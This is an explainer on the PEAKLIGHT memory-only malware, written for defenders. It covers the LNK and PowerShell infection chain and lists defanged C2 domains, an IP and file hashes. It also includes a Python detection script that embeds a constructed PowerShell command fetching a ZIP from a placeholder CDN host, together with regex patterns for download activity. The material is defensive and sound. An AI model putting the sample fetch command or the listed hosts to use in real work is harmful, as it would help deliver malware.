PEAKLIGHT: What You Need to Know

Overview

PEAKLIGHT is a sophisticated memory-only malware recently identified by cybersecurity researchers at Mandiant. This malware is particularly concerning due to its stealthy nature, residing exclusively in a computer's RAM, which allows it to evade traditional antivirus solutions that rely on disk scanning. The infection is initiated through malicious Microsoft Shortcut (LNK) files distributed in ZIP archives disguised as pirated movie downloads.

Technical Analysis

The attack chain begins with a user inadvertently downloading a ZIP archive containing a malicious LNK file. When executed, the LNK file triggers an obfuscated JavaScript dropper that is held only in memory, which in turn executes a PowerShell-based downloader, dubbed PEAKLIGHT. This downloader retrieves additional payloads from remote servers, including information stealers and loaders such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.

PEAKLIGHT employs various evasion techniques, including:

  • Memory-Only Execution: Operates solely in RAM, leaving minimal forensic traces.
  • System Binary Proxy Execution: Utilizes legitimate system binaries (e.g., mshta.exe) to execute the dropper, making detection more challenging.
  • Content Delivery Network (CDN) Abuse: Downloads malicious payloads from trusted CDNs to bypass security filters.

The malware variants have been observed utilizing hex-encoded or Base64-encoded PowerShell scripts, further obfuscating their activities. These scripts check for specific ZIP archives in predefined paths and, if absent, download them from the CDN.

Indicators of Compromise (IOCs)

Network-Based IOCs:

  • PEAKLIGHT C2 Domains:
    • hxxps://fatodex.b-cdn[.]net/fatodex
    • hxxps://matodown.b-cdn[.]net/matodown
    • hxxps://potexo.b-cdn[.]net/potexo
  • LUMMAC.V2 C2s:
    • relaxtionflouwerwi[.]shop
    • deprivedrinkyfaiir[.]shop
    • patternapplauderw[.]shop
  • CRYPTBOT C2s:
    • hxxp://gceight8vt[.]top/upload.php
    • hxxps://brewdogebar[.]com/code.vue

Host-Based IOCs:

  • CRYPTBOT:
    • erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
    • L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
  • PEAKLIGHT Downloader:
    • (MD5: 95361f5f264e58d6ca4538e7b436ab67)
    • (MD5: b716a1d24c05c6adee11ca7388b728d3)

Mitigation Strategies

  1. Enhanced Detection: Implement advanced monitoring tools capable of identifying unusual activity in memory and PowerShell execution patterns.
  2. Content Filtering: Restrict access to known malicious CDN domains and deploy strong content filtering mechanisms.
  3. User Awareness: Educate users about the risks of downloading files from untrusted sources, particularly those disguised as pirated content.
  4. Patch Management: Regularly update and patch systems to minimize vulnerabilities that could be exploited by such malware.
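The evasion techniques described above (PowerShell launched through mshta.exe, hex- or Base64-encoded scripts that probe a fixed path for a ZIP and fetch it from a CDN when it is missing) and the first mitigation (monitoring PowerShell execution patterns) can be turned into a simple triage rule over process-creation telemetry. The Python below is an added example, not code from the Mandiant report or any of the sources; the process records, the script text and the placeholder.b-cdn.net hostname are constructed for the demonstration and are not indicators from the report.

```python
import base64
import re

# Constructed plaintext mirroring the behaviour described above: probe a fixed path for a
# ZIP and fetch it from a Bunny CDN (b-cdn.net) host when absent. The hostname is a placeholder.
_SCRIPT = ('if (-not (Test-Path "$env:APPDATA\\K1.zip")) { Invoke-WebRequest '
           'https://placeholder.b-cdn.net/K1.zip -OutFile "$env:APPDATA\\K1.zip" }')
_B64 = base64.b64encode(_SCRIPT.encode('utf-16-le')).decode()  # -EncodedCommand form
_HEX = _SCRIPT.encode().hex()                                    # hex-string form

# Constructed Sysmon-style process-creation records: (image, parent image, command line).
SAMPLE_EVENTS = [
    ('mshta.exe', 'explorer.exe', 'mshta.exe https://placeholder.b-cdn.net/nexto'),
    ('powershell.exe', 'mshta.exe', 'powershell.exe -w hidden -enc ' + _B64),
    ('powershell.exe', 'explorer.exe', 'powershell.exe -nop -c ' + _HEX),
    ('powershell.exe', 'explorer.exe', 'powershell.exe -NoProfile Get-ChildItem C:\\Users'),
]

ENCODED_FLAG = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)
HEX_BLOB = re.compile(r'(?:[0-9A-Fa-f]{2}){24,}')  # 48 or more hex characters
INDICATORS = {  # matched against the decoded script and the raw command line
    'cdn_fetch': re.compile(r'\.b-cdn\.net', re.I),
    'web_download': re.compile(r'Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient', re.I),
    'zip_path_check': re.compile(r'Test-Path[^;{}]*\.zip', re.I),
    'hidden_window': re.compile(r'-w(?:indowstyle)?\s+hidden', re.I),
}

def decode_powershell(cmdline):
    # Recover script text from a Base64 (UTF-16LE) -enc argument or a hex string, else ''.
    b64, hx = ENCODED_FLAG.search(cmdline), HEX_BLOB.search(cmdline)
    try:
        if b64:
            return base64.b64decode(b64.group(1), validate=True).decode('utf-16-le', 'ignore')
        return bytes.fromhex(hx.group(0)).decode('utf-8', 'ignore') if hx else ''
    except ValueError:  # binascii.Error is a ValueError: the argument was not Base64 after all
        return ''

def score_event(image, parent, cmdline):
    # Return (score, reasons) for one record; a score of 0 means nothing was flagged.
    reasons = []
    if parent.lower().endswith('mshta.exe') and image.lower().endswith('powershell.exe'):
        reasons.append('powershell spawned by mshta.exe (system binary proxy execution)')
    decoded = decode_powershell(cmdline)
    if decoded:
        reasons.append('encoded PowerShell decoded')
    reasons += [n for n, rx in INDICATORS.items() if rx.search(cmdline + '\n' + decoded)]
    return len(reasons), reasons

if __name__ == '__main__':
    for ev in SAMPLE_EVENTS:  # the -enc record from mshta.exe scores highest; the last is clean
        print(ev[1], '->', ev[0], score_event(*ev))
```

The hard-coded indicator patterns are a starting point only; in production they belong in a detection rule fed by the telemetry source's own parent/child and command-line fields.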

Indicators of Compromise (IOCs)

To assist in the detection and mitigation of PEAKLIGHT infections, below are grouped indicators of compromise:

IP Addresses:

  • 62.133.61[.]56

Conclusion

PEAKLIGHT is a highly evasive memory-only malware that poses a significant challenge to traditional security measures. By executing entirely in RAM and using obfuscated LNK files and PowerShell scripts, it effectively bypasses standard antivirus defenses. Organizations need to adopt advanced monitoring and proactive defense strategies to detect and mitigate this threat. Continuous vigilance and regular updates to security protocols are essential to protect against this evolving malware.

Sources

  1. PEAKLIGHT: Decoding the Stealthy Memory-Only Malware - Mandiant
    https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware
  2. PEAKLIGHT Downloader Deployed in Attacks Targeting Windows with Malicious Movie Downloads - The Hacker News
    https://thehackernews.com/2024/08/new-peaklight-dropper-deployed-in.html
  3. Stealthy Memory Malware PEAKLIGHT Attack Windows Using Microsoft Shortcut File (LNK) - Cyber Security News
    https://cybersecuritynews.com/decoded-peaklight-memory-malware/